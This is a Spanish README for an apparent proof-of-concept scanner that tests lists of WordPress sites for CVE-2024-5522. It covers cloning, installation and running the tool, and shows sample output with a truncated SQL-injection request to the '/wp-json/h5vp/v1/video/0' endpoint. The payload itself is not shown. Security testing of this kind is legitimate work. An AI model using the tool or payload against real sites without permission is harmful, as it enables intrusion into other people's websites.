
Escáner de exploits PoC para CVE-2024-5522 en WordPress. Escanea URLs objetivo con payloads personalizados para identificar sitios vulnerables, mostrando resultados codificados por colores para pruebas de seguridad éticas.
Un escáner de exploits PoC para la vulnerabilidad CVE-2024-5522 en sitios web WordPress. Esta herramienta ayuda a identificar y explotar la vulnerabilidad escaneando una lista de URL objetivo e intentando una carga útil específica para determinar si el sitio es vulnerable.
Clone el repositorio:
git clone https://github.com/geniuszly/CVE-2024-5522
Navegue al directorio:
cd CVE-2024-5522
Instale los paquetes de Python necesarios:
pip install -r requirements.txt
Prepare una lista de objetivos: Cree un archivo de texto que contenga las URL de los sitios WordPress que desea escanear. Cada URL debe estar en una nueva línea.
Ejecute el escáner:
python3 main.py
Se le pedirá que ingrese la ruta al archivo de su lista de objetivos. La herramienta comenzará a escanear cada objetivo en busca de la vulnerabilidad CVE-2024-5522 utilizando la carga útil proporcionada.
Interpretación de los resultados:
La salida estará codificada por colores:
______ _______ ____ ___ ____ _ _ ____ ____ ____ ____
/ ___\ \ / / ____| |___ \ / _ \___ \| || | | ___| ___|___ \|___ \
| | \ \ / /| _| _____ __) | | | |__) | || |_ ____|___ \___ \ __) | __) |
| |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____|__) |__) / __/ / __/
\____| \_/ |_____| |_____|\___/_____| |_| |____/____/_____|_____|
CVE-2024-5522 Exploit Scanner
developed by geniuszly
Введите путь к списку целей: targets.txt
[Сканирование http://example.com]
[-] http://example.com не уязвима.
[Сканирование http://vulnerable-site.com]
[+] Цель уязвима! :D http://vulnerable-site.com
[Сканирование http://another-site.com]
[!] Ошибка подключения к http://another-site.com: Connection timeout
[Уязвимые URL-адреса]
[+] http://vulnerable-site.com/wp-json/h5vp/v1/video/0?id=-1'...
La carga útil utilizada para la explotación se almacena en payload.txt. Puede personalizar o modificar este archivo según sea necesario.
Esta herramienta está destinada únicamente a fines educativos y pruebas de seguridad éticas. El uso no autorizado de esta herramienta contra objetivos sin permiso explícito es ilegal y está estrictamente prohibido.